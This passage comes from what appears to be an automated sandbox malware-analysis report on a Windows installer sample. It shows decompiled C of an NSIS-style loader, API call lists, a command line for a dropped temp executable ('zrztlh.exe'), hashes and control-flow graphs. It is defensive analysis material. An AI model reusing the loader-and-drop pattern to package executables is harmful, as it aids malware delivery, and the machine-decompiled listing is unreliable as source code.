								__eflags =  *0x423fac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fa0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4236f8); // executed
						 *0x423f24 = _t133;
						EndDialog(_t125,  *0x41f8f8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x4236f8, 0x40f, 0, 1);
						__eflags =  *0x4236ec - _t133; // 0x7fffffff
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420508, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420508,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F5C(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x4236f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f8f8 = 1;
											L21:
											_push(0x78);
											L22:
											E00403ECE();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f8f8 = _t127;
										goto L21;
									}
									__eflags =  *0x409238 - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x4236f8);
						 *0x4236f8 = _a12;
						L58:
						_t141 =  *0x421530 - _t133; // 0x0
						if(_t141 == 0) {
							_t142 =  *0x4236f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421530 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

































                0x00403a2b
                0x00403a34
                0x00403b75
                0x00403b79
                0x00403b7d
                0x00403b7f
                0x00403b84
                0x00403b8f
                0x00403b9a
                0x00403b9f
                0x00403ba1
                0x00403ba3
                0x00403ba6
                0x00403bab
                0x00403bb9
                0x00403bc6
                0x00403bcd
                0x00403bcd
                0x00403bce
                0x00403bce
                0x00403bd3
                0x00403bd9
                0x00403be0
                0x00403be6
                0x00403be8
                0x00403c28
                0x00403c2d
                0x00403c32
                0x00403c32
                0x00403c37
                0x00403c40
                0x00403c42
                0x00403c47
                0x00403c4d
                0x00403c51
                0x00403c51
                0x00403c56
                0x00403c5c
                0x00000000
                0x00000000
                0x00403c62
                0x00403c67
                0x00403c6d
                0x00000000
                0x00000000
                0x00403c73
                0x00403c76
                0x00403c79
                0x00403c7e
                0x00403c83
                0x00403c86
                0x00403c8c
                0x00403c91
                0x00403c94
                0x00403c9a
                0x00403c9f
                0x00403ca2
                0x00403ca8
                0x00403cb0
                0x00403cb6
                0x00403cbc
                0x00403cc0
                0x00403cc7
                0x00403cc7
                0x00403cc7
                0x00403cd1
                0x00403ce3
                0x00403cef
                0x00403cf4
                0x00403cfe
                0x00403d04
                0x00403d06
                0x00403d0b
                0x00403d08
                0x00403d08
                0x00403d08
                0x00403d1b
                0x00403d33
                0x00403d35
                0x00403d3b
                0x00403d50
                0x00403d3d
                0x00403d46
                0x00403d48
                0x00403d48
                0x00403d56
                0x00403d66
                0x00403d6b
                0x00403d76
                0x00403d77
                0x00403d7e
                0x00403d88
                0x00403d8d
                0x00403d8f
                0x00000000
                0x00403d95
                0x00403d95
                0x00403d97
                0x00000000
                0x00000000
                0x00403d9d
                0x00403da1
                0x00403dc6
                0x00403dcc
                0x00403dd2
                0x00403dd4
                0x00000000
                0x00000000
                0x00403dfa
                0x00403e00
                0x00403e02
                0x00403e07
                0x00000000
                0x00000000
                0x00403e0d
                0x00403e10
                0x00403e13
                0x00403e2a
                0x00403e36
                0x00403e4f
                0x00403e59
                0x00403e5e
                0x00403e64
                0x00000000
                0x00000000
                0x00403e6e
                0x00403e79
                0x00000000
                0x00403e79
                0x00403da3
                0x00403da9
                0x00000000
                0x00000000
                0x00403daf
                0x00403db5
                0x00000000
                0x00000000
                0x00000000
                0x00403dbb
                0x00403d8f
                0x00403e86
                0x00403e92
                0x00403e99
                0x00000000
                0x00403bea
                0x00403bea
                0x00403bed
                0x00403c20
                0x00403c20
                0x00403c22
                0x00000000
                0x00000000
                0x00000000
                0x00403c22
                0x00403bf3
                0x00403bf8
                0x00403bfa
                0x00000000
                0x00000000
                0x00403c0a
                0x00403c12
                0x00000000
                0x00403c18
                0x00403a46
                0x00403a46
                0x00403a4a
                0x00403a4f
                0x00403a5e
                0x00403a5e
                0x00403a67
                0x00403a70
                0x00403a7b
                0x00403a7b
                0x00403a87
                0x00403aa3
                0x00403aa6
                0x00403ab9
                0x00403abf
                0x00403b62
                0x00000000
                0x00403b6b
                0x00403ac5
                0x00403ad2
                0x00403ad4
                0x00403ad6
                0x00403af5
                0x00403af5
                0x00403af8
                0x00403afd
                0x00403b00
                0x00403b10
                0x00403b11
                0x00403b13
                0x00403b49
                0x00403b5c
                0x00000000
                0x00403b5c
                0x00403b15
                0x00403b1b
                0x00403b34
                0x00403b39
                0x00403b3b
                0x00000000
                0x00000000
                0x00403b3d
                0x00403b29
                0x00403b29
                0x00403b2b
                0x00403b2b
                0x00000000
                0x00403b2b
                0x00403b1e
                0x00403b23
                0x00000000
                0x00403b23
                0x00403b02
                0x00403b08
                0x00000000
                0x00000000
                0x00403b0a
                0x00000000
                0x00403b0a
                0x00403afa
                0x00000000
                0x00403afa
                0x00403ae0
                0x00403ae7
                0x00403aed
                0x00403aef
                0x00000000
                0x00000000
                0x00000000
                0x00403aef
                0x00403aab
                0x00000000
                0x00403a89
                0x00403a8f
                0x00403a99
                0x00403e9f
                0x00403e9f
                0x00403ea5
                0x00403ea7
                0x00403ead
                0x00403eb2
                0x00403eb8
                0x00403eb8
                0x00403ead
                0x00403ec2
                0x00000000
                0x00403ec2
                0x00403a87

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5E
                • ShowWindow.USER32(?), ref: 00403A7B
                • DestroyWindow.USER32 ref: 00403A8F
                • SetWindowLongA.USER32 ref: 00403AAB
                • GetDlgItem.USER32 ref: 00403ACC
                • SendMessageA.USER32 ref: 00403AE0
                • IsWindowEnabled.USER32(00000000), ref: 00403AE7
                • GetDlgItem.USER32 ref: 00403B95
                • GetDlgItem.USER32 ref: 00403B9F
                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403BB9
                • SendMessageA.USER32 ref: 00403C0A
                • GetDlgItem.USER32 ref: 00403CB0
                • ShowWindow.USER32(00000000,?), ref: 00403CD1
                • EnableWindow.USER32(?,?), ref: 00403CE3
                • EnableWindow.USER32(?,?), ref: 00403CFE
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D14
                • EnableMenuItem.USER32 ref: 00403D1B
                • SendMessageA.USER32 ref: 00403D33
                • SendMessageA.USER32 ref: 00403D46
                • lstrlenA.KERNEL32(00420530,?,00420530,xwkwrbeiqiuu Setup), ref: 00403D6F
                • SetWindowTextA.USER32(?,00420530), ref: 00403D7E
                • ShowWindow.USER32(?,0000000A), ref: 00403EB2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                • String ID: xwkwrbeiqiuu Setup
                • API String ID: 4050669955-1811721691
                • Opcode ID: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                • Instruction ID: a83dcc86622e640bdf6b153063aa13b6230d1eae5258657c65e28bef3e163658
                • Opcode Fuzzy Hash: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                • Instruction Fuzzy Hash: E8C1D171A04205BBDB21AF21ED45D2B7EBCEB44706F50053EF601B12F1C779AA829B1E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004036A1 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213stringregistrylibraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 207 4036a1-4036b9 call 405dda 210 4036bb-4036cb call 405a52 207->210 211 4036cd-4036f4 call 4059db 207->211 219 403717-403736 call 403955 call 4056c8 210->219 215 4036f6-403707 call 4059db 211->215 216 40370c-403712 lstrcatA 211->216 215->216 216->219 225 40373c-403741 219->225 226 4037bd-4037c5 call 4056c8 219->226 225->226 227 403743-403767 call 4059db 225->227 232 4037d3-4037f8 LoadImageA 226->232 233 4037c7-4037ce call 405b16 226->233 227->226 236 403769-40376b 227->236 234 403887-40388f call 40140b 232->234 235 4037fe-403834 RegisterClassA 232->235 233->232 249 403891-403894 234->249 250 403899-4038a4 call 403955 234->250 238 40383a-403882 SystemParametersInfoA CreateWindowExA 235->238 239 40394b 235->239 241 40377c-403788 lstrlenA 236->241 242 40376d-40377a call 405612 236->242 238->234 246 40394d-403954 239->246 243 4037b0-4037b8 call 4055e7 call 405af4 241->243 244 40378a-403798 lstrcmpiA 241->244 242->241 243->226 244->243 248 40379a-4037a4 GetFileAttributesA 244->248 253 4037a6-4037a8 248->253 254 4037aa-4037ab call 40562e 248->254 249->246 260 403922-40392a call 404f71 250->260 261 4038a6-4038c3 ShowWindow LoadLibraryA 250->261 253->243 253->254 254->243 268 403944-403946 call 40140b 260->268 269 40392c-403932 260->269 263 4038c5-4038ca LoadLibraryA 261->263 264 4038cc-4038de GetClassInfoA 261->264 263->264 266 4038e0-4038f0 GetClassInfoA RegisterClassA 264->266 267 4038f6-403919 DialogBoxParamA call 40140b 264->267 266->267 273 40391e-403920 267->273 268->239 269->249 271 403938-40393f call 40140b 269->271 271->249 273->246
                C-Code - Quality: 89%
                			E004036A1() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x423f28; // 0x74d188
				_t20 = E00405DDA(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420530;
					"1033" = 0x7830;
					E004059DB(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420530, 0);
					__eflags =  *0x420530;
					if(__eflags == 0) {
						E004059DB(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072FE, 0x420530, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405A52("1033",  *_t20() & 0x0000ffff);
				}
				E00403955(_t75, _t87);
				_t24 =  *0x423f30; // 0x80
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423fa0 = _t24 & 0x00000020;
				if(E004056C8(_t87, _t84) != 0) {
					L16:
					if(E004056C8(_t95, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E00405B16(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x423f20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423708 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403955(_t75, __eflags);
							__eflags =  *0x423fc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F71(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4236ec; // 0x7fffffff
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420508, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236c0);
								 *0x4236e4 = _t85;
								RegisterClassA(0x4236c0);
							}
							_t39 =  *0x423700; // 0x0
							_t42 = DialogBoxParamA( *0x423f20, _t39 + 0x00000069 & 0x0000ffff, 0, E00403A22, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423f20; // 0x400000
						 *0x4236d4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236c4 = E00401000;
						 *0x4236d0 = _t75;
						 *0x4236e4 =  &_v20;
						if(RegisterClassA(0x4236c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420508 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f20, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423f58; // 0x74eb84
					_t78 = 0x422ec0;
					E004059DB( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422ec0, 0);
					_t61 =  *0x422ec0; // 0x43
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422ec1;
						 *((char*)(E00405612(0x422ec1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405AF4(_t84, E004055E7(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E0040562E(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}






























                0x004036a7
                0x004036b0
                0x004036b7
                0x004036b9
                0x004036cd
                0x004036df
                0x004036e9
                0x004036ee
                0x004036f4
                0x00403707
                0x00403707
                0x00403712
                0x004036bb
                0x004036c6
                0x004036c6
                0x00403717
                0x0040371c
                0x00403721
                0x0040372a
                0x00403736
                0x004037bd
                0x004037c5
                0x004037c7
                0x004037cd
                0x004037ce
                0x004037ce
                0x004037e4
                0x004037ea
                0x004037f8
                0x00403887
                0x0040388f
                0x00403899
                0x0040389e
                0x004038a4
                0x00403923
                0x00403928
                0x0040392a
                0x00403946
                0x00000000
                0x00403946
                0x0040392c
                0x00403932
                0x0040393a
                0x0040393a
                0x00000000
                0x00403932
                0x004038ae
                0x004038bf
                0x004038c1
                0x004038c3
                0x004038ca
                0x004038ca
                0x004038d2
                0x004038da
                0x004038dc
                0x004038de
                0x004038e7
                0x004038ea
                0x004038f0
                0x004038f0
                0x004038f6
                0x0040390f
                0x00403919
                0x00000000
                0x0040391e
                0x00403891
                0x00403893
                0x00000000
                0x004037fe
                0x004037fe
                0x00403804
                0x0040380e
                0x00403816
                0x00403820
                0x00403826
                0x00403834
                0x0040394b
                0x0040394b
                0x00000000
                0x0040394b
                0x0040383a
                0x00403843
                0x00403882
                0x00000000
                0x00403882
                0x0040373c
                0x0040373c
                0x00403741
                0x00000000
                0x00000000
                0x00403746
                0x0040374b
                0x0040375b
                0x00403760
                0x00403767
                0x00000000
                0x00000000
                0x0040376b
                0x0040376d
                0x0040377a
                0x0040377a
                0x00403782
                0x00403788
                0x004037b0
                0x004037b8
                0x00000000
                0x0040379a
                0x0040379b
                0x004037a4
                0x004037aa
                0x004037ab
                0x00000000
                0x004037ab
                0x004037a6
                0x004037a8
                0x00000000
                0x00000000
                0x00000000
                0x004037a8
                0x00403788

                APIs
                  • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                  • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
                  • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08
                • lstrcatA.KERNEL32(1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403712
                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,?,?,?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ), ref: 0040377D
                • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,?,?,?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000), ref: 00403790
                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx), ref: 0040379B
                • LoadImageA.USER32 ref: 004037E4
                  • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                • RegisterClassA.USER32 ref: 0040382B
                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403843
                • CreateWindowExA.USER32 ref: 0040387C
                • ShowWindow.USER32(00000005,00000000), ref: 004038AE
                • LoadLibraryA.KERNELBASE(RichEd20), ref: 004038BF
                • LoadLibraryA.KERNEL32(RichEd32), ref: 004038CA
                • GetClassInfoA.USER32 ref: 004038DA
                • GetClassInfoA.USER32 ref: 004038E7
                • RegisterClassA.USER32 ref: 004038F0
                • DialogBoxParamA.USER32 ref: 0040390F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                • API String ID: 914957316-2084434793
                • Opcode ID: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                • Instruction ID: 396c3099e5e99d0af67321f2f40d51cf7d39f14f72ddbb9a737c40d3af2db82b
                • Opcode Fuzzy Hash: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                • Instruction Fuzzy Hash: 5261C6B1704200BBD620AF61AD45F3B3ABDEB4474AB50447FF941B22E1D77CA9458A3E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C7D Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 218memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 276 402c7d-402ccc GetTickCount GetModuleFileNameA call 4057cb 279 402cd8-402d06 call 405af4 call 40562e call 405af4 GetFileSize 276->279 280 402cce-402cd3 276->280 288 402e45-402e4b 279->288 289 402d0c-402d23 279->289 281 402f6a-402f6e 280->281 290 402e51-402e54 288->290 291 402f22-402f27 288->291 292 402d25 289->292 293 402d27-402d2d call 40327d 289->293 294 402e80-402ecc GlobalAlloc call 405eb4 call 4057fa CreateFileA 290->294 295 402e56-402e6e call 4032af call 40327d 290->295 291->281 292->293 298 402d32-402d34 293->298 320 402ee8-402f18 call 4032af call 402f71 294->320 321 402ece-402ed3 294->321 295->291 316 402e74-402e7a 295->316 301 402ed8-402edb 298->301 302 402d3a-402d40 298->302 301->291 308 402edd-402ee6 DestroyWindow 301->308 305 402dd4-402dd8 302->305 306 402d46-402d5e call 40578c 302->306 309 402dda-402ddd 305->309 310 402e0e-402e14 305->310 306->310 325 402d64-402d6b 306->325 308->291 314 402de7-402df0 GetTickCount 309->314 315 402ddf-402de5 call 405e13 309->315 318 402e16-402e24 call 405e46 310->318 319 402e27-402e31 310->319 314->310 324 402df2-402e0b CreateDialogParamA 314->324 315->310 316->291 316->294 318->319 319->289 327 402e37-402e3a 319->327 335 402f1d-402f20 320->335 321->281 324->310 325->310 330 402d71-402d78 325->330 327->288 332 402e3c-402e3f DestroyWindow 327->332 330->310 334 402d7e-402d85 330->334 332->288 334->310 336 402d8b-402d92 334->336 335->291 337 402f29-402f3a 335->337 336->310 338 402d94-402db4 336->338 339 402f42-402f47 337->339 340 402f3c 337->340 338->291 341 402dba-402dbe 338->341 342 402f48-402f4e 339->342 340->339 343 402dc0-402dc4 341->343 344 402dc6-402dce 341->344 342->342 346 402f50-402f68 call 40578c 342->346 343->327 343->344 344->310 345 402dd0-402dd2 344->345 345->310 346->281
                C-Code - Quality: 96%
                			E00402C7D(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				char _v308;
				signed int _t63;
				void* _t65;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				void* _t76;
				intOrPtr* _t78;
				intOrPtr _t79;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				signed int _t91;
				long _t95;
				signed int _t100;
				intOrPtr _t103;
				signed int _t111;
				signed int _t112;
				void* _t113;
				signed int _t114;
				signed int _t117;
				void* _t118;

				_v8 = 0;
				_v20 = GetTickCount() + 0x3e8;
				_v12 = 0;
				_v16 = 0;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe", 0x400);
				_t113 = E004057CB("C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe", 0x80000000, 3);
				 *0x409020 = _t113;
				if(_t113 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405AF4("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe");
				E00405AF4(0x42b000, E0040562E("C:\\Users\\alfons\\Desktop"));
				_t63 = GetFileSize(_t113, 0);
				__eflags = _t63;
				 *0x41f0e0 = _t63;
				_t117 = _t63;
				if(_t63 <= 0) {
					L27:
					__eflags =  *0x423f2c; // 0x7e00
					if(__eflags == 0) {
						goto L36;
					}
					__eflags = _v16;
					if(_v16 == 0) {
						L31:
						_t65 = GlobalAlloc(0x40, _v28); // executed
						_t118 = _t65;
						E00405EB4(0x40b008);
						E004057FA( &_v308, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t70 = CreateFileA( &_v308, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t70 - 0xffffffff;
						 *0x409024 = _t70;
						if(_t70 != 0xffffffff) {
							_t71 =  *0x423f2c; // 0x7e00
							_t73 = E004032AF(_t71 + 0x1c);
							 *0x41f0e4 = _t73;
							 *0x4170d8 = _t73 - ( !_v48 & 0x00000004) + _v24 - 0x1c; // executed
							_t76 = E00402F71(_v24, 0xffffffff, 0, _t118, _v28); // executed
							__eflags = _t76 - _v28;
							if(_t76 == _v28) {
								__eflags = _v48 & 0x00000001;
								 *0x423f28 = _t118;
								 *0x423f30 =  *_t118;
								if((_v48 & 0x00000001) != 0) {
									 *0x423f34 =  *0x423f34 + 1;
									__eflags =  *0x423f34;
								}
								_t54 = _t118 + 0x44; // 0x44
								_t78 = _t54;
								_t111 = 8;
								do {
									_t78 = _t78 - 8;
									 *_t78 =  *_t78 + _t118;
									_t111 = _t111 - 1;
									__eflags = _t111;
								} while (_t111 != 0);
								_t79 =  *0x4170d4; // 0x604ca
								 *((intOrPtr*)(_t118 + 0x3c)) = _t79;
								E0040578C(0x423f40, _t118 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L36;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004032AF( *0x4170d0);
					_t85 = E0040327D( &_a4, 4);
					__eflags = _t85;
					if(_t85 == 0) {
						goto L36;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L36;
					}
					goto L31;
				} else {
					do {
						_t87 =  *0x423f2c; // 0x7e00
						_t114 = _t117;
						asm("sbb eax, eax");
						_t90 = ( ~_t87 & 0x00007e00) + 0x200;
						__eflags = _t117 - _t90;
						if(_t117 >= _t90) {
							_t114 = _t90;
						}
						_t91 = E0040327D(0x4170e0, _t114); // executed
						__eflags = _t91;
						if(_t91 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L36:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x423f2c; // 0x7e00
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t95 = GetTickCount();
									__eflags = _t95 - _v20;
									if(_t95 > _v20) {
										_v8 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, "verifying installer: %d%%");
									}
								} else {
									E00405E13(0);
								}
							}
							goto L22;
						}
						E0040578C( &_v48, 0x4170e0, 0x1c);
						_t100 = _v48;
						__eflags = _t100 & 0xfffffff0;
						if((_t100 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_a4 = _a4 | _t100;
						_t112 =  *0x4170d0; // 0x0
						 *0x423fc0 =  *0x423fc0 | _a4 & 0x00000002;
